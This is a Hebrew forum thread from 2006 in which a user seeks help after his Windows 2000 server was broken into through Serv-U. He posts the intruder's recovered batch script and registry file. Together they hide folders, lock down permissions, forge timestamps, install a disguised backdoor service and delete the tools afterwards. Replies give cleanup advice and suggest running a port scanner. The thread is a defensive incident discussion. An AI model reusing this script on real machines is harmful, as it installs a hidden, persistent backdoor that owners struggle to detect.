לוגו אתר Fresh          
 
 
  אפשרות תפריט  ראשי     אפשרות תפריט  צ'אט     אפשרות תפריט  מבזקים     אפשרות תפריט  צור קשר     חץ שמאלה חץ ימינה  

לך אחורה   לובי הפורומים > מחשבים > חומרה ורשתות
שמור לעצמך קישור לדף זה באתרי שמירת קישורים חברתיים
תגובה
 
כלי אשכול חפש באשכול זה



  #1  
ישן 20-05-2006, 04:05
  ליאור אונליין ליאור אונליין אינו מחובר  
 
חבר מתאריך: 28.10.01
הודעות: 1,291
שרת וינדוס שנפרץ

יש לי מחשב שאני משתמש בו כשרת.
המחשב מריץ:
Windows 2000 Sp4
Serv-U
Apache
MySQL
uTorrent
VNC Server
ZoneAlarm w/ AV
המחשב נמצא ברשת, אבל בלי שיתופי כוננים.
גירסאות אחרונות של הכל, ועדכוני וינדוס אחרונים מותקנים.
ב"בדיקה שגרתית" שמתי לב שההגדרות של Serv-U שונו, ונוצרו בהם יוזרים חדשים (orbit, leech, upload) עם גישת אדמין לכל הכוננים וגישה לתיקיה "
[ c:\System Volume Information\catalog\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\backup" להעלאה והורדה.
לא מצאתי שום ראייה לשינוי של הקובץ, אז הרצתי חיפוש על כל הקבצים שנוצרו במחשב ב24 שעות האחרונות. מצאתי ארכיון בשם Kit.exe באחד הכוננים, שמכיל 23 קבצים שכנראה כולם קשורים, ובאחד באמת מצאתי את הגדרות השרת החדשות.
הנה רשימת הקבצים:
קוד:
Volume in drive R is Server Volume Serial Number is 20DA-B1A0 Directory of R:\programs\kit 05/20/2006 04:23a <DIR> . 05/20/2006 04:23a <DIR> .. 03/01/2004 06:16p 10,240 caclsENG.exe 05/21/2005 01:44p 157 dcg.acx 02/26/2006 10:29p 571 diadv.msc 02/26/2006 10:29p 2,390 diagw.msc 02/03/2006 01:20p 9,405 fgh 02/03/2006 01:13p 421,888 fgh.dll 05/21/2005 01:46p 847,872 libeay32.dll 10/15/2005 03:52a 40,960 mdts.exe 05/21/2005 01:45p 722 pci.acx 01/31/2006 12:44p 1,830,912 qttask.exe 05/21/2005 01:41p 1,812 re.reg 05/21/2005 01:44p 48,128 reg.exe 02/03/2006 01:46p 140,183 settimedate.exe 05/21/2005 01:45p 159,744 ssleay32.dll 10/15/2005 03:53a 32,358 sv.exe 05/21/2005 01:46p 973 svcon.crt 05/21/2005 01:46p 963 svcon.key 10/15/2005 03:52a 22,528 svrany.exe 06/10/2005 10:27a 32,768 touch.exe 10/13/2005 02:46p 428 wci.acx 03/14/2006 10:52a 3,384 work.txt 08/04/2004 02:00p 30 wre.cdm 06/10/2005 10:28a 45,056 xcacls.exe 23 File(s) 3,653,472 bytes 2 Dir(s) 24,685,027,328 bytes free

מה שלא מצאתי, זה איך הקובץ הוחדר.
אחד הקבצים המעניינים שראיתי שם זה work.txt שנראה כקובץ Batch שביצע את הכל. זה התוכן שלו:
קוד:
@echo off :: create folders xcacls.exe "c:\System Volume Information" /G EVERYONE:F /Y mkdir "c:\System Volume Information\catalog\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\backup" attrib.exe +h +s +r "c:\System Volume Information" attrib.exe +h +s +r "c:\System Volume Information\catalog" attrib.exe +h +s +r "c:\System Volume Information\catalog\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}" attrib.exe +h +s +r "c:\System Volume Information\catalog\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\backup" echo y|caclsENG "c:\System Volume Information" /T /G system:f Administrators:R echo y|caclsENG "c:\System Volume Information\catalog" /T /G system:f echo y|caclsENG "c:\System Volume Information\catalog\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}" /T /G system:f echo y|caclsENG "c:\System Volume Information\catalog\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\backup" /T /G system:f ::change the time of the folder to make it the same as c:\RECYCLER touch.exe -g "c:\RECYCLER" "c:\System Volume Information" touch.exe -g "c:\RECYCLER" "c:\System Volume Information\catalog" touch.exe -g "c:\RECYCLER" "c:\System Volume Information\catalog\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}" touch.exe -g "c:\RECYCLER" "c:\System Volume Information\catalog\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\backup" ::lock the folders (NOTE: working folder needs to be two deep from DENY folder) xcacls.exe "c:\System Volume Information\catalog\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\backup" /G EVERYONE:F /Y xcacls.exe "c:\System Volume Information\catalog\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}" /G SYSTEM:F /Y xcacls.exe "c:\System Volume Information\catalog" /D EVERYONE /Y xcacls.exe "c:\System Volume Information" /G SYSTEM:F /Y cd\ c: cd %systemroot% cd system32 qttask.exe /i net start LdmSvc net start LdmSvc net start LdmSvc net start LdmSvc net start LdmSvc regedit /s re.reg settimedate pci.acx settimedate diagw.msc settimedate wci.acx settimedate fgh.dll settimedate qttask.exe settimedate fgh settimedate lyae.cmm settimedate wre.cdm :securen reg add "HKLM\SYSTEM\CurrentControlSet\Services\LanManServe r\Parameters" /v AutoShareServer /t REG_DWORD /d 0 /f reg add "HKLM\SYSTEM\CurrentControlSet\Services\LanManServe r\Parameters" /v AutoShareWks /t REG_DWORD /d 0 /f settimedate dqr.icm settimedate svcon.crt settimedate svcon.key settimedate dcg.acx settimedate libeay32.dll settimedate ssleay32.dll del reg.exe del wget.exe del re.reg del xcacls.exe del touch.exe del caclsENG.exe attrib +s +r +h pci.acx attrib +s +r +h wci.acx attrib +s +r +h fgh attrib +s +r +h qttask.exe attrib +s +r +h fgh.dll attrib +s +r +h svcon.crt attrib +s +r +h svcon.key attrib +s +r +h libeay32.dll attrib +s +r +h ssleay32.dll attrib +s +r +h wre.cdm attrib +s +h diagw.msc :installed del diadv.msc del bla.txt del work.bat copy mdts.exe %systemroot% copy sv.exe %systemroot% copy svrany.exe %systemroot% copy settimedate.exe %systemroot% cd\ cd %systemroot% sv.exe CREATESVRANY "LogDisc" "Logical Disk Client " "%systemroot%\svrany.exe" "%systemroot%\mdts.exe" net start LogDisc net start LogDisc net start LogDisc del sv.exe settimedate.exe svrany.exe settimedate.exe mdts.exe attrib +s +r +h svrany.exe attrib +s +r +h mdts.exe del settimedate.exe cd system32 del mdts.exe del svrany.exe del sv.exe del settimedate.exe

מה שגם שמתי לב שהאייקון של ServU מהבהב כל הזמן כאילו יש בו פעילות, אבל לא נראה שום משתמש בו.
לאחר שגיליתי על כל זה שיניתי את האייפי של המחשב ובינתיים נראה שאין בו פעילות (והאייקון גם הפסיק להבהב). לפני שאני מחזיר את המחשב לאייפי המקורי, איך אני יכול להפוך את כל השינויים שהפורץ ביצע? (לפי work.txt), איך אני יכול לגלות איך כל זה קרה, ואיך למנוע מזה לקרות בעתיד?
תודה

נערך לאחרונה ע"י ליאור אונליין בתאריך 20-05-2006 בשעה 04:08.
תגובה ללא ציטוט תגובה עם ציטוט חזרה לפורום
  #2  
ישן 20-05-2006, 10:11
  משתמש זכר elitea elitea אינו מחובר  
 
חבר מתאריך: 17.06.05
הודעות: 591
שלח הודעה דרך MSN אל elitea
בתגובה להודעה מספר 1 שנכתבה על ידי ליאור אונליין שמתחילה ב "שרת וינדוס שנפרץ"

כן , ה"קיט" שלהם כביכול עושה את כל הפעילויות
ודרך הקובץ word.txt ההוא שראיתי אפשר גם לעשות פעילויות כמו להתחבר לאפטיפי מסוים להוריד קבצים לבצע פקודות במחשב וכ'ו וכ'ו
מה שאני מציע לך זה ככה
קודם כל לסגור את הסרביו גם את התוכנה , גם את התוכנה וגם את כל הפרוססים שקשורים לזה .
אחרי זה להתחיל לראות מה המצב תסגור את כל הדברים שקשורים לאינטרנט אצלך כמו דפדפן תוכנה הטורנטים שלך וכ'ו . ותבצע בדיקה netstat -an לאחר מכן תבדוק אם אנשים מחוברים למחשב שלך בפורטים מוזרים שכאלה .
אם ההבעייה חוזרת לא יודע אם תוכל עם התוכנות הרגילות להסיר את זה , פירמוט ואבטחת המחשב מחדש יועילו מאוד.
בהצלחה.
נ.ב היוזר עם המספרים המוזרים יוצר מעין תקייה שנראת לך שונה ומעבירה אותך לאותה תקייה
לדוגמא control panel ואתה תראה את זה כך ושתכנס לבדוק זה גם יכנס לשם , אבל בעצם זאת תקייה אחרת .
_____________________________________

[התמונה הבאה מגיעה מקישור שלא מתחיל ב https ולכן לא הוטמעה בדף כדי לשמור על https תקין: http://gyous.djsgoa.co.il/forum/sign/gal.php?start_date=20%2F5%2F2007&end_date=30%2F6%2F2010&-=.jpg]




תגובה ללא ציטוט תגובה עם ציטוט חזרה לפורום
  #3  
ישן 20-05-2006, 13:05
  ליאור אונליין ליאור אונליין אינו מחובר  
 
חבר מתאריך: 28.10.01
הודעות: 1,291
בתגובה להודעה מספר 2 שנכתבה על ידי elitea שמתחילה ב "כן , ה"קיט" שלהם כביכול עושה..."

טוב, ניסיתי להפוך את השינויים שבוצעו אבל חלק אני לא יודע איך..לדוגמא, זה מה שהקובץ רג'יסטרי ביצע:
קוד:
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\lanmanserver] "DependOnService"=hex(7):4c,00,64,00,6d,00,53,00,76,00,63,00,00,00, 00,00 "DependOnGroup"=hex(7):00,00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\lanmanworkstation] "DependOnService"=hex(7):4c,00,64,00,6d,00,53,00,76,00,63,00,00,00, 00,00 "DependOnGroup"=hex(7):00,00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\Eventlog] "DependOnService"=hex(7):4c,00,64,00,6d,00,53,00,76,00,63,00,00,00, 00,00 "DependOnGroup"=hex(7):00,00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\PlugPlay] "DependOnService"=hex(7):4c,00,64,00,6d,00,53,00,76,00,63,00,00,00, 00,00 "DependOnGroup"=hex(7):00,00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\RpcSs] "DependOnService"=hex(7):4c,00,64,00,6d,00,53,00,76,00,63,00,00,00, 00,00 "DependOnGroup"=hex(7):00,00


איך אני יכול לדעת מה היה שם קודם, ולהחזיר את זה?
תגובה ללא ציטוט תגובה עם ציטוט חזרה לפורום
  #14  
ישן 20-05-2006, 14:32
צלמית המשתמש של Novellspy
  Novellspy Novellspy אינו מחובר  
 
חבר מתאריך: 31.10.01
הודעות: 1,008
בתגובה להודעה מספר 7 שנכתבה על ידי ליאור אונליין שמתחילה ב "גם אני התחברתי לשרת,..."

ב- Dfind תחפש את הפורט שהוא חיפש עליו בפקודה שמופיעה למעלה צריכה להיות משו כזה:
dfind.exe -p portnumber XXX.XXX.XXX.XXX XXX.XXX.XXX.XXX כמובן שהportnumber הוא הפורט שעליו הוא חיפש את נקודות התורפה.

אחרי זה תריץ חיפוש משכיל לגבי הפורט. כלומר, תחפש בגוגל את מספר הפורט ותכתוב exploit או משו בסגנון תבין איפה הייתה החולייה החלשה ותעדכן אותה.

הזון אלארם לא התריע כי כנראה הפורט היה מאושר על ידי אחת התוכנות שלך.
משום מה אני חושב שזה הmysql בכל מקרה, זה נראה כמו ילדוני סקריפט ככה שתמיד עדיף לעדכן את כל התכונות שרת שלך לגרסאות הכי מעודכנות. לפי איך שזה כתוב זה נראה שהם לא השתמשו במשו שעדיין לא דווח...

אני חייב להגיד שילדוני הסקריפט נהים מתחוכמים.

תגובה ללא ציטוט תגובה עם ציטוט חזרה לפורום
תגובה

כלי אשכול חפש באשכול זה
חפש באשכול זה:

חיפוש מתקדם
מצבי תצוגה דרג אשכול זה
דרג אשכול זה:

מזער את תיבת המידע אפשרויות משלוח הודעות
אתה לא יכול לפתוח אשכולות חדשים
אתה לא יכול להגיב לאשכולות
אתה לא יכול לצרף קבצים
אתה לא יכול לערוך את ההודעות שלך

קוד vB פעיל
קוד [IMG] פעיל
קוד HTML כבוי
מעבר לפורום



כל הזמנים המוצגים בדף זה הם לפי איזור זמן GMT +2. השעה כעת היא 22:50

הדף נוצר ב 0.09 שניות עם 10 שאילתות

הפורום מבוסס על vBulletin, גירסא 3.0.6
כל הזכויות לתוכנת הפורומים שמורות © 2024 - 2000 לחברת Jelsoft Enterprises.
כל הזכויות שמורות ל Fresh.co.il ©

צור קשר | תקנון האתר